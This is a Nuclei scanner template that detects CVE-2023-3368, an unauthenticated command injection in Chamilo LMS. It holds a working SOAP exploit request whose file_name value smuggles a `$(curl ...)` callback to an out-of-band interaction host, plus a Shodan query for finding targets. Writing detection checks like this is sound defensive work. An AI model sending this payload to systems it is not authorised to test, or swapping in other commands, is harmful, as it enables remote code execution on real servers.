77 lines
2.8 KiB
YAML
77 lines
2.8 KiB
YAML
id: CVE-2023-3368
|
|
|
|
info:
|
|
name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
Command injection in `/main/webservices/additional_webservices.php`
|
|
in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
|
|
remote code execution via improper neutralisation of special characters.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3368
|
|
- https://starlabs.sg/advisories/23/23-3368/
|
|
- https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-3368
|
|
cwe-id: CWE-78
|
|
epss-score: 0.00072
|
|
epss-percentile: 0.29771
|
|
cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: chamilo
|
|
product: chamilo
|
|
shodan-query: http.component:"Chamilo"
|
|
tags: cve,cve2023,chamilo,unauth,cmd,rce
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/main/webservices/additional_webservices.php"
|
|
|
|
headers:
|
|
Content-Type: application/xml
|
|
|
|
body: |
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
|
<SOAP-ENV:Body>
|
|
<ns1:wsConvertPpt>
|
|
<param0 xsi:type="ns2:Map">
|
|
<item>
|
|
<key xsi:type="xsd:string">file_data</key>
|
|
<value xsi:type="xsd:string"></value>
|
|
</item>
|
|
<item>
|
|
<key xsi:type="xsd:string">file_name</key>
|
|
<value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
|
|
</item>
|
|
<item>
|
|
<key xsi:type="xsd:string">service_ppt2lp_size</key>
|
|
<value xsi:type="xsd:string">720x540</value>
|
|
</item>
|
|
</param0>
|
|
</ns1:wsConvertPpt>
|
|
</SOAP-ENV:Body>
|
|
</SOAP-ENV:Envelope>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "wsConvertPptResponse"
|
|
part: body
|
|
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
# digest: 4b0a00483046022100957e8b67086430465c38a9c565d8d68cf32bcd0813a1b7ccbecad1d6ea8212a0022100da806fb7b98dffc11c139d2aa79464cb8d2ed2ca51ef587af6b893324dc3003a:922c64590222798bb761d5b6d8e72950 |